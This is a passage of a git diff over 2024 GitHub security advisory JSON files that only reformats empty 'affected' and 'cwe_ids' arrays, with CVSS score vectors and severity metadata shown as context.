{ "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-6mw6-j92w-4h63/GHSA-6mw6-j92w-4h63.json b/advisories/unreviewed/2024/06/GHSA-6mw6-j92w-4h63/GHSA-6mw6-j92w-4h63.json index 6e0c932e570..d5ee39a1b44 100644 --- a/advisories/unreviewed/2024/06/GHSA-6mw6-j92w-4h63/GHSA-6mw6-j92w-4h63.json +++ b/advisories/unreviewed/2024/06/GHSA-6mw6-j92w-4h63/GHSA-6mw6-j92w-4h63.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-83cc-qgcr-qjcw/GHSA-83cc-qgcr-qjcw.json b/advisories/unreviewed/2024/06/GHSA-83cc-qgcr-qjcw/GHSA-83cc-qgcr-qjcw.json index b1f5a2c5497..ee6d8db2e23 100644 --- a/advisories/unreviewed/2024/06/GHSA-83cc-qgcr-qjcw/GHSA-83cc-qgcr-qjcw.json +++ b/advisories/unreviewed/2024/06/GHSA-83cc-qgcr-qjcw/GHSA-83cc-qgcr-qjcw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-9485-jr2m-q8rx/GHSA-9485-jr2m-q8rx.json b/advisories/unreviewed/2024/06/GHSA-9485-jr2m-q8rx/GHSA-9485-jr2m-q8rx.json index 3d9269a6bb5..953d43bc420 100644 --- a/advisories/unreviewed/2024/06/GHSA-9485-jr2m-q8rx/GHSA-9485-jr2m-q8rx.json +++ b/advisories/unreviewed/2024/06/GHSA-9485-jr2m-q8rx/GHSA-9485-jr2m-q8rx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-g5fx-mv2q-2jpr/GHSA-g5fx-mv2q-2jpr.json b/advisories/unreviewed/2024/06/GHSA-g5fx-mv2q-2jpr/GHSA-g5fx-mv2q-2jpr.json index c7d3261406d..91ef6954840 100644 --- a/advisories/unreviewed/2024/06/GHSA-g5fx-mv2q-2jpr/GHSA-g5fx-mv2q-2jpr.json +++ b/advisories/unreviewed/2024/06/GHSA-g5fx-mv2q-2jpr/GHSA-g5fx-mv2q-2jpr.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-jm3x-qp4q-p8jr/GHSA-jm3x-qp4q-p8jr.json b/advisories/unreviewed/2024/06/GHSA-jm3x-qp4q-p8jr/GHSA-jm3x-qp4q-p8jr.json index 60a5bca0dac..83785c4a88f 100644 --- a/advisories/unreviewed/2024/06/GHSA-jm3x-qp4q-p8jr/GHSA-jm3x-qp4q-p8jr.json +++ b/advisories/unreviewed/2024/06/GHSA-jm3x-qp4q-p8jr/GHSA-jm3x-qp4q-p8jr.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-mj9w-3qrj-p3gj/GHSA-mj9w-3qrj-p3gj.json b/advisories/unreviewed/2024/06/GHSA-mj9w-3qrj-p3gj/GHSA-mj9w-3qrj-p3gj.json index a2ccae13428..570c6cb7d96 100644 --- a/advisories/unreviewed/2024/06/GHSA-mj9w-3qrj-p3gj/GHSA-mj9w-3qrj-p3gj.json +++ b/advisories/unreviewed/2024/06/GHSA-mj9w-3qrj-p3gj/GHSA-mj9w-3qrj-p3gj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-qcm6-ww7j-hm8x/GHSA-qcm6-ww7j-hm8x.json b/advisories/unreviewed/2024/06/GHSA-qcm6-ww7j-hm8x/GHSA-qcm6-ww7j-hm8x.json index c77f092d089..092a5998f50 100644 --- a/advisories/unreviewed/2024/06/GHSA-qcm6-ww7j-hm8x/GHSA-qcm6-ww7j-hm8x.json +++ b/advisories/unreviewed/2024/06/GHSA-qcm6-ww7j-hm8x/GHSA-qcm6-ww7j-hm8x.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-vh8w-5wph-86hm/GHSA-vh8w-5wph-86hm.json b/advisories/unreviewed/2024/06/GHSA-vh8w-5wph-86hm/GHSA-vh8w-5wph-86hm.json index 1ceef879818..fb8d3c06b82 100644 --- a/advisories/unreviewed/2024/06/GHSA-vh8w-5wph-86hm/GHSA-vh8w-5wph-86hm.json +++ b/advisories/unreviewed/2024/06/GHSA-vh8w-5wph-86hm/GHSA-vh8w-5wph-86hm.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/07/GHSA-h8w3-pcg4-xxxh/GHSA-h8w3-pcg4-xxxh.json b/advisories/unreviewed/2024/07/GHSA-h8w3-pcg4-xxxh/GHSA-h8w3-pcg4-xxxh.json index 879aaff8263..f16551ed80c 100644 --- a/advisories/unreviewed/2024/07/GHSA-h8w3-pcg4-xxxh/GHSA-h8w3-pcg4-xxxh.json +++ b/advisories/unreviewed/2024/07/GHSA-h8w3-pcg4-xxxh/GHSA-h8w3-pcg4-xxxh.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/07/GHSA-pvxg-5348-rxvf/GHSA-pvxg-5348-rxvf.json b/advisories/unreviewed/2024/07/GHSA-pvxg-5348-rxvf/GHSA-pvxg-5348-rxvf.json index ad31cb90069..20f30a94a52 100644 --- a/advisories/unreviewed/2024/07/GHSA-pvxg-5348-rxvf/GHSA-pvxg-5348-rxvf.json +++ b/advisories/unreviewed/2024/07/GHSA-pvxg-5348-rxvf/GHSA-pvxg-5348-rxvf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-rj56-mm47-cqp3/GHSA-rj56-mm47-cqp3.json b/advisories/unreviewed/2024/08/GHSA-rj56-mm47-cqp3/GHSA-rj56-mm47-cqp3.json index 00250ebe216..52d1354f7d0 100644 --- a/advisories/unreviewed/2024/08/GHSA-rj56-mm47-cqp3/GHSA-rj56-mm47-cqp3.json +++ b/advisories/unreviewed/2024/08/GHSA-rj56-mm47-cqp3/GHSA-rj56-mm47-cqp3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-285g-gc96-4xjh/GHSA-285g-gc96-4xjh.json b/advisories/unreviewed/2024/09/GHSA-285g-gc96-4xjh/GHSA-285g-gc96-4xjh.json index 634b825b7f1..51d6e31ec95 100644 --- a/advisories/unreviewed/2024/09/GHSA-285g-gc96-4xjh/GHSA-285g-gc96-4xjh.json +++ b/advisories/unreviewed/2024/09/GHSA-285g-gc96-4xjh/GHSA-285g-gc96-4xjh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -55,9 +53,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-2g8x-wxp8-jhpg/GHSA-2g8x-wxp8-jhpg.json b/advisories/unreviewed/2024/09/GHSA-2g8x-wxp8-jhpg/GHSA-2g8x-wxp8-jhpg.json index 91e7bbd1982..788015ba526 100644 --- a/advisories/unreviewed/2024/09/GHSA-2g8x-wxp8-jhpg/GHSA-2g8x-wxp8-jhpg.json +++ b/advisories/unreviewed/2024/09/GHSA-2g8x-wxp8-jhpg/GHSA-2g8x-wxp8-jhpg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-2hcr-rj2w-r9vj/GHSA-2hcr-rj2w-r9vj.json b/advisories/unreviewed/2024/09/GHSA-2hcr-rj2w-r9vj/GHSA-2hcr-rj2w-r9vj.json index af82d38d983..8c15b33d6d1 100644 --- a/advisories/unreviewed/2024/09/GHSA-2hcr-rj2w-r9vj/GHSA-2hcr-rj2w-r9vj.json +++ b/advisories/unreviewed/2024/09/GHSA-2hcr-rj2w-r9vj/GHSA-2hcr-rj2w-r9vj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-3252-jgxw-qhmv/GHSA-3252-jgxw-qhmv.json b/advisories/unreviewed/2024/09/GHSA-3252-jgxw-qhmv/GHSA-3252-jgxw-qhmv.json index 0712b9749fd..15e961eff64 100644 --- a/advisories/unreviewed/2024/09/GHSA-3252-jgxw-qhmv/GHSA-3252-jgxw-qhmv.json +++ b/advisories/unreviewed/2024/09/GHSA-3252-jgxw-qhmv/GHSA-3252-jgxw-qhmv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-3x94-47mg-35rf/GHSA-3x94-47mg-35rf.json b/advisories/unreviewed/2024/09/GHSA-3x94-47mg-35rf/GHSA-3x94-47mg-35rf.json index d553d21be80..51a75a930e5 100644 --- a/advisories/unreviewed/2024/09/GHSA-3x94-47mg-35rf/GHSA-3x94-47mg-35rf.json +++ b/advisories/unreviewed/2024/09/GHSA-3x94-47mg-35rf/GHSA-3x94-47mg-35rf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-4grv-37wf-jg36/GHSA-4grv-37wf-jg36.json b/advisories/unreviewed/2024/09/GHSA-4grv-37wf-jg36/GHSA-4grv-37wf-jg36.json index 17c3a0110dc..3a917fbeb1a 100644 --- a/advisories/unreviewed/2024/09/GHSA-4grv-37wf-jg36/GHSA-4grv-37wf-jg36.json +++ b/advisories/unreviewed/2024/09/GHSA-4grv-37wf-jg36/GHSA-4grv-37wf-jg36.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-4qww-pqq9-xrw5/GHSA-4qww-pqq9-xrw5.json b/advisories/unreviewed/2024/09/GHSA-4qww-pqq9-xrw5/GHSA-4qww-pqq9-xrw5.json index d87f6326c79..aa22cfe6611 100644 --- a/advisories/unreviewed/2024/09/GHSA-4qww-pqq9-xrw5/GHSA-4qww-pqq9-xrw5.json +++ b/advisories/unreviewed/2024/09/GHSA-4qww-pqq9-xrw5/GHSA-4qww-pqq9-xrw5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-4w3q-gj3x-9575/GHSA-4w3q-gj3x-9575.json b/advisories/unreviewed/2024/09/GHSA-4w3q-gj3x-9575/GHSA-4w3q-gj3x-9575.json index 71d0b64494f..e06beb018f1 100644 --- a/advisories/unreviewed/2024/09/GHSA-4w3q-gj3x-9575/GHSA-4w3q-gj3x-9575.json +++ b/advisories/unreviewed/2024/09/GHSA-4w3q-gj3x-9575/GHSA-4w3q-gj3x-9575.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-6287-c9rj-fp6j/GHSA-6287-c9rj-fp6j.json b/advisories/unreviewed/2024/09/GHSA-6287-c9rj-fp6j/GHSA-6287-c9rj-fp6j.json index a26f1346835..9dcf503ea9f 100644 --- a/advisories/unreviewed/2024/09/GHSA-6287-c9rj-fp6j/GHSA-6287-c9rj-fp6j.json +++ b/advisories/unreviewed/2024/09/GHSA-6287-c9rj-fp6j/GHSA-6287-c9rj-fp6j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-7555-3222-qmcm/GHSA-7555-3222-qmcm.json b/advisories/unreviewed/2024/09/GHSA-7555-3222-qmcm/GHSA-7555-3222-qmcm.json index 1160ad80546..b96fd66f2de 100644 --- a/advisories/unreviewed/2024/09/GHSA-7555-3222-qmcm/GHSA-7555-3222-qmcm.json +++ b/advisories/unreviewed/2024/09/GHSA-7555-3222-qmcm/GHSA-7555-3222-qmcm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-95vm-ph4x-xhv5/GHSA-95vm-ph4x-xhv5.json b/advisories/unreviewed/2024/09/GHSA-95vm-ph4x-xhv5/GHSA-95vm-ph4x-xhv5.json index 5b248c510fe..e6287509eca 100644 --- a/advisories/unreviewed/2024/09/GHSA-95vm-ph4x-xhv5/GHSA-95vm-ph4x-xhv5.json +++ b/advisories/unreviewed/2024/09/GHSA-95vm-ph4x-xhv5/GHSA-95vm-ph4x-xhv5.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-9cxr-86mw-8jw2/GHSA-9cxr-86mw-8jw2.json b/advisories/unreviewed/2024/09/GHSA-9cxr-86mw-8jw2/GHSA-9cxr-86mw-8jw2.json index 9e209a101c0..e9a62de93ff 100644 --- a/advisories/unreviewed/2024/09/GHSA-9cxr-86mw-8jw2/GHSA-9cxr-86mw-8jw2.json +++ b/advisories/unreviewed/2024/09/GHSA-9cxr-86mw-8jw2/GHSA-9cxr-86mw-8jw2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-c7j9-vm5x-xj32/GHSA-c7j9-vm5x-xj32.json b/advisories/unreviewed/2024/09/GHSA-c7j9-vm5x-xj32/GHSA-c7j9-vm5x-xj32.json index 4d39d1d7e46..4cdb057078c 100644 --- a/advisories/unreviewed/2024/09/GHSA-c7j9-vm5x-xj32/GHSA-c7j9-vm5x-xj32.json +++ b/advisories/unreviewed/2024/09/GHSA-c7j9-vm5x-xj32/GHSA-c7j9-vm5x-xj32.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-f3vh-8mjp-cx6c/GHSA-f3vh-8mjp-cx6c.json b/advisories/unreviewed/2024/09/GHSA-f3vh-8mjp-cx6c/GHSA-f3vh-8mjp-cx6c.json index 54f0f335e56..c4c57d73c52 100644 --- a/advisories/unreviewed/2024/09/GHSA-f3vh-8mjp-cx6c/GHSA-f3vh-8mjp-cx6c.json +++ b/advisories/unreviewed/2024/09/GHSA-f3vh-8mjp-cx6c/GHSA-f3vh-8mjp-cx6c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-fc2q-mrvj-fwmp/GHSA-fc2q-mrvj-fwmp.json b/advisories/unreviewed/2024/09/GHSA-fc2q-mrvj-fwmp/GHSA-fc2q-mrvj-fwmp.json index 38297b618c8..3620642548a 100644 --- a/advisories/unreviewed/2024/09/GHSA-fc2q-mrvj-fwmp/GHSA-fc2q-mrvj-fwmp.json +++ b/advisories/unreviewed/2024/09/GHSA-fc2q-mrvj-fwmp/GHSA-fc2q-mrvj-fwmp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-fg4m-w584-q5x8/GHSA-fg4m-w584-q5x8.json b/advisories/unreviewed/2024/09/GHSA-fg4m-w584-q5x8/GHSA-fg4m-w584-q5x8.json index 57e402e9a59..2cd55a58509 100644 --- a/advisories/unreviewed/2024/09/GHSA-fg4m-w584-q5x8/GHSA-fg4m-w584-q5x8.json +++ b/advisories/unreviewed/2024/09/GHSA-fg4m-w584-q5x8/GHSA-fg4m-w584-q5x8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-fmxj-97w3-xq3m/GHSA-fmxj-97w3-xq3m.json b/advisories/unreviewed/2024/09/GHSA-fmxj-97w3-xq3m/GHSA-fmxj-97w3-xq3m.json index b4074848aec..378ba0e1c8b 100644 --- a/advisories/unreviewed/2024/09/GHSA-fmxj-97w3-xq3m/GHSA-fmxj-97w3-xq3m.json +++ b/advisories/unreviewed/2024/09/GHSA-fmxj-97w3-xq3m/GHSA-fmxj-97w3-xq3m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-h37g-6773-5r89/GHSA-h37g-6773-5r89.json b/advisories/unreviewed/2024/09/GHSA-h37g-6773-5r89/GHSA-h37g-6773-5r89.json index c411092778d..35c094c057d 100644 --- a/advisories/unreviewed/2024/09/GHSA-h37g-6773-5r89/GHSA-h37g-6773-5r89.json +++ b/advisories/unreviewed/2024/09/GHSA-h37g-6773-5r89/GHSA-h37g-6773-5r89.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-jh62-xx57-p239/GHSA-jh62-xx57-p239.json b/advisories/unreviewed/2024/09/GHSA-jh62-xx57-p239/GHSA-jh62-xx57-p239.json index 1cf4965adea..2a21911c23e 100644 --- a/advisories/unreviewed/2024/09/GHSA-jh62-xx57-p239/GHSA-jh62-xx57-p239.json +++ b/advisories/unreviewed/2024/09/GHSA-jh62-xx57-p239/GHSA-jh62-xx57-p239.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-jp9w-w77g-78h3/GHSA-jp9w-w77g-78h3.json b/advisories/unreviewed/2024/09/GHSA-jp9w-w77g-78h3/GHSA-jp9w-w77g-78h3.json index 152856d1a23..b0295537b1e 100644 --- a/advisories/unreviewed/2024/09/GHSA-jp9w-w77g-78h3/GHSA-jp9w-w77g-78h3.json +++ b/advisories/unreviewed/2024/09/GHSA-jp9w-w77g-78h3/GHSA-jp9w-w77g-78h3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-m49p-vxgg-3vx7/GHSA-m49p-vxgg-3vx7.json b/advisories/unreviewed/2024/09/GHSA-m49p-vxgg-3vx7/GHSA-m49p-vxgg-3vx7.json index 54cbec0e081..7988579c769 100644 --- a/advisories/unreviewed/2024/09/GHSA-m49p-vxgg-3vx7/GHSA-m49p-vxgg-3vx7.json +++ b/advisories/unreviewed/2024/09/GHSA-m49p-vxgg-3vx7/GHSA-m49p-vxgg-3vx7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-m5hr-8xhp-qgx7/GHSA-m5hr-8xhp-qgx7.json b/advisories/unreviewed/2024/09/GHSA-m5hr-8xhp-qgx7/GHSA-m5hr-8xhp-qgx7.json index 31a266c023a..2be98d665b3 100644 --- a/advisories/unreviewed/2024/09/GHSA-m5hr-8xhp-qgx7/GHSA-m5hr-8xhp-qgx7.json +++ b/advisories/unreviewed/2024/09/GHSA-m5hr-8xhp-qgx7/GHSA-m5hr-8xhp-qgx7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-m95h-4hjq-w7wv/GHSA-m95h-4hjq-w7wv.json b/advisories/unreviewed/2024/09/GHSA-m95h-4hjq-w7wv/GHSA-m95h-4hjq-w7wv.json index 1defff661dc..167b9775d15 100644 --- a/advisories/unreviewed/2024/09/GHSA-m95h-4hjq-w7wv/GHSA-m95h-4hjq-w7wv.json +++ b/advisories/unreviewed/2024/09/GHSA-m95h-4hjq-w7wv/GHSA-m95h-4hjq-w7wv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-mhrv-mcvx-mvx7/GHSA-mhrv-mcvx-mvx7.json b/advisories/unreviewed/2024/09/GHSA-mhrv-mcvx-mvx7/GHSA-mhrv-mcvx-mvx7.json index 83361621d58..8ba03a359a4 100644 --- a/advisories/unreviewed/2024/09/GHSA-mhrv-mcvx-mvx7/GHSA-mhrv-mcvx-mvx7.json +++ b/advisories/unreviewed/2024/09/GHSA-mhrv-mcvx-mvx7/GHSA-mhrv-mcvx-mvx7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-p79g-j2j8-9wqw/GHSA-p79g-j2j8-9wqw.json b/advisories/unreviewed/2024/09/GHSA-p79g-j2j8-9wqw/GHSA-p79g-j2j8-9wqw.json index e693b127014..5d9a48ef020 100644 --- a/advisories/unreviewed/2024/09/GHSA-p79g-j2j8-9wqw/GHSA-p79g-j2j8-9wqw.json +++ b/advisories/unreviewed/2024/09/GHSA-p79g-j2j8-9wqw/GHSA-p79g-j2j8-9wqw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-pp73-8587-cg75/GHSA-pp73-8587-cg75.json b/advisories/unreviewed/2024/09/GHSA-pp73-8587-cg75/GHSA-pp73-8587-cg75.json index 24c83f2be72..5f8b09f4396 100644 --- a/advisories/unreviewed/2024/09/GHSA-pp73-8587-cg75/GHSA-pp73-8587-cg75.json +++ b/advisories/unreviewed/2024/09/GHSA-pp73-8587-cg75/GHSA-pp73-8587-cg75.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-pwxr-xm9v-qfvh/GHSA-pwxr-xm9v-qfvh.json b/advisories/unreviewed/2024/09/GHSA-pwxr-xm9v-qfvh/GHSA-pwxr-xm9v-qfvh.json index f24b330f44c..4cce130b5ef 100644 --- a/advisories/unreviewed/2024/09/GHSA-pwxr-xm9v-qfvh/GHSA-pwxr-xm9v-qfvh.json +++ b/advisories/unreviewed/2024/09/GHSA-pwxr-xm9v-qfvh/GHSA-pwxr-xm9v-qfvh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": 